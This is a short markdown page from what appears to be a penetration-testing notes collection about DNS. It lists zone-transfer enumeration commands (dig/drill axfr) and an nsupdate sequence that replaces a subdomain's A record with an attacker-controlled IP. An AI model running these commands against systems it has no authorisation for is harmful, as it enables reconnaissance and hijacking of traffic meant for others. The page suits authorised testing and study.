killchain-compendium/Enumeration/DNS.md

499 B

DNS

Subdomain Enumeration

  • Get all the info via
dig     @$TARGET_DNS $DOMAIN axfr
drill   @$TARGET_DNS $DOMAIN axfr

Join a Domain

  • Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
  • Check domain by querying the subdomain's A record via dig/drill/nslookup